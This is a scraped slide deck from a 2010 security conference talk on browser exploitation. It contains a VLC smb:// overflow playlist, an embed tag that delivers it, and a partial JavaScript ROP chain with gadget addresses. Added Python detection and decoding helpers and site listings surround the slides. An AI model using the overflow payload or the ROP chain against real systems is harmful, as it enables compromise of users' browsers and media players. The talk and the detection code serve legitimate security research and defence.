W.E.B. 2010 - Web . Exploits . Browsers. Saumil Shah, Hack in the Box - Kuala Lumpur 2010
# who am i Saumil Shah, CEO Net-square LinkedIn: saumilshah
LOOK AT ALL THE COOL STUFF!!
33% MORE!
With JIT! Fights DEP, ASLR!
Worldwide coverage, Hides your tracks.
...as never seen before!
GUARANTEED!! Fresh new bugs, Present on most computers
I can haz sandbox I Also Can!
IM IN UR BASE KILLING UR D00DZ Sploit Time!
See no EVAL. CVE-2010-2883 (0+1)day exploit: obfuscated JavaScript decoded without using eval, document.write, etc.
Who you gonna call?
howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN.
howstuffworks - Anti Virus These are not the sploitz you're looking for.
0-day to the Face! "To get our new signature files you need a valid support plan."
...and keep on patching
W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets MIND THE GAP
Sploit Time!
Making the impossible possible smb:// mrl buffer overflow
VLC smb:// overflow - playlist

<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1"
    xmlns="http://xspf.org/ns/0/"
    xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>
...just add bit.ly smb:// mrl buffer overflow
100% Pure Alphanum!
VLC smb overflow - HTMLized!!

<embed type="application/x-vlc-plugin"
       width="320" height="200"
       target="http://tinyurl.com/ycctrzf"
       id="vlc" />

I'm in ur browser.... ...blowin up ur g00dz pwn
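An added defensive check, not code from the slides: it parses an XSPF playlist and flags smb:// locations shaped like the overlong MRL above (a very long MRL, or a long run of one filler character). The length and run thresholds and the sample playlist are assumptions constructed for the example.

```python
"""Added example, not from the slides: flag XSPF playlists whose smb:// MRL
looks like overflow filler rather than a share path."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XSPF_NS = "{http://xspf.org/ns/0/}"
MAX_SANE_MRL_LEN = 256   # assumed threshold for an ordinary share path; tune per site
MIN_FILLER_RUN = 64      # assumed: a run this long of one character is filler, not a name

# Constructed sample: the slide's playlist (filler shortened) plus two ordinary tracks.
SAMPLE_PLAYLIST = """<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/"
          xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>smb://example.com@0.0.0.0/foo/#%s</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
    <track><location>smb://fileserver/media/holiday.mkv</location></track>
    <track><location>http://example.org/clip.mp4</location></track>
  </trackList>
</playlist>
""" % ("A" * 600)


def longest_run(s):
    """Length of the longest run of one repeated character in s (0 for empty)."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def smb_locations(xml_text):
    """Return every smb:// <location> value in the playlist, in document order."""
    root = ET.fromstring(xml_text)
    found = []
    for loc in root.iter(XSPF_NS + "location"):
        text = (loc.text or "").strip()
        if text.lower().startswith("smb://"):
            found.append(text)
    return found


def suspicious_smb_locations(xml_text, max_len=MAX_SANE_MRL_LEN, min_run=MIN_FILLER_RUN):
    """Return [(mrl, [reasons])] for smb:// MRLs that look like overflow payloads."""
    findings = []
    for mrl in smb_locations(xml_text):
        parts = urlsplit(mrl)          # scheme / userinfo@host / path / fragment
        reasons = []
        if len(mrl) > max_len:
            reasons.append("length %d exceeds %d" % (len(mrl), max_len))
        # The filler in the slide's MRL sits after '#', so inspect path and fragment.
        run = longest_run(parts.path + parts.fragment)
        if run >= min_run:
            reasons.append("run of %d identical characters" % run)
        if reasons:
            findings.append((mrl, reasons))
    return findings


if __name__ == "__main__":
    for mrl, why in suspicious_smb_locations(SAMPLE_PLAYLIST):
        print(mrl[:48] + "...", "->", "; ".join(why))
```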
I'm an evil Javascript I'm an innocent image
function packv(n){
  var s=new Number(n).toString(16);
  while(s.length<8) s="0"+s;
  return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)));
}
var addressof=new Array();
addressof["ropnop"]=0x6d81bdf0;
addressof["xchg_eax_esp_ret"]=0x6d81bdef;
addressof["pop_eax_ret"]=0x6d906744;
addressof["pop_ecx_ret"]=0x6d81cd57;
addressof["mov_peax_ecx_ret"]=0x6d979720;
addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
addressof["mov_pecx_eax_ret"]=0x6d8eee01;
addressof["inc_eax_ret"]=0x6d838f54;
addressof["add_eax_4_ret"]=0x00000000;
addressof["call_peax_ret"]=0x6d8aec31;
addressof["add_esp_24_ret"]=0x00000000;
addressof["popad_ret"]=0x6d82a8a1;
addressof["call_peax"]=0x6d802597;
function call_ntallocatevirtualmemory(baseptr,size,callnum){
  var ropnop=packv(addressof["ropnop"]);
  var pop_eax_ret=packv(addressof["pop_eax_ret"]);
  var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
  var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
  var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
  var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
  var call_peax_ret=packv(addressof["call_peax_ret"]);
  var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
  var popad_ret=packv(addressof["popad_ret"]);
  var retval=""

EET - Exploit Enabler Technology <canvas>
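An added triage helper, not code from the slides: it reverses the packv() function in the snippet above, recovering the 32-bit little-endian values behind the %uXXXX escapes of a captured script and counting how they cluster by memory region, which is how an analyst spots a pointer table aimed at one fixed-base module. The sample values are constructed for the example.

```python
"""Added example, not from the slides: decode %u-packed dwords from a captured
script and summarise where in memory they point."""
import re


def packv(n):
    """Python port of the slide's packv(): 32-bit value -> two %u escapes, low word first."""
    s = "%08x" % (n & 0xFFFFFFFF)
    return "%%u%s%%u%s" % (s[4:8], s[0:4])


def unpack_unicode_escapes(text):
    """Reverse packv() over a whole string: pair consecutive %uXXXX code units
    into little-endian dwords. A trailing unpaired unit is ignored."""
    units = [int(h, 16) for h in re.findall(r"%u([0-9a-fA-F]{4})", text)]
    return [units[i] | (units[i + 1] << 16) for i in range(0, len(units) - 1, 2)]


def regions(words, shift=20):
    """Count recovered values per 1 MiB region (value >> 20 << 20).
    Many pointers in one region suggest a gadget table for a module loaded at a fixed base."""
    counts = {}
    for w in words:
        base = (w >> shift) << shift
        counts[base] = counts.get(base, 0) + 1
    return counts


# Constructed sample: three values packed the way the slide's script would emit them.
SAMPLE_VALUES = [0x10001234, 0x10002ABC, 0x41414141]
SAMPLE_SCRIPT = 'var chain = "' + "".join(packv(v) for v in SAMPLE_VALUES) + '";'


if __name__ == "__main__":
    words = unpack_unicode_escapes(SAMPLE_SCRIPT)
    print(["0x%08x" % w for w in words])
    for base, n in sorted(regions(words).items()):
        print("region 0x%08x: %d pointer(s)" % (base, n))
```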
The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps
shoutz... L33tdawg, Amy, cbelinda KUL volunteerz NL crew Paul Vixie
kthxbai www.net-square.com secure . automate . innovate

Más contenido relacionado

La actualidad más candente

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureJames Jara
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deploymentGyuSeok Lee
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deploymentGyuSeok Lee
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websitesdrupalforest
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheJames Jara
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxJames Jara
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linuxJames Jara
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Joey Wilhelm
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.Jan Schaumann
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsPositive Hack Days
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...MilanAryal
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instaladoJames Jara
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 

La actualidad más candente (19)

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configure
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websites
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apache
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linux
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linux
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!
 
Robots
RobotsRobots
Robots
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never Sleeps
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instalado
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 

Destacado

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoSaumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 

Destacado (7)

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San Diego
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 

Similar a W.E.B. 2010 - Web, Exploits, Browsers

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net OdysseySaumil Shah
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?Erik Rose
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010Saumil Shah
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersPeter-Paul Koch
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationbrucelawson
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionPeter Lubbers
 
Best practices in museum search
 Best practices in museum search Best practices in museum search
Best practices in museum searchNate Solas
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schillerscottschiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsRicardo Varela
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEMDamien Antipa
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 

Similar a W.E.B. 2010 - Web, Exploits, Browsers (20)

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net Odyssey
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solr
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Yahoo for the Masses
Yahoo for the MassesYahoo for the Masses
Yahoo for the Masses
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The Browsers
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentation
 
[In Control 2010] HTML5
[In Control 2010] HTML5[In Control 2010] HTML5
[In Control 2010] HTML5
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert Session
 
Best practices in museum search
 Best practices in museum search Best practices in museum search
Best practices in museum search
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEM
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber Security
 

Más de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Más de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Último

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
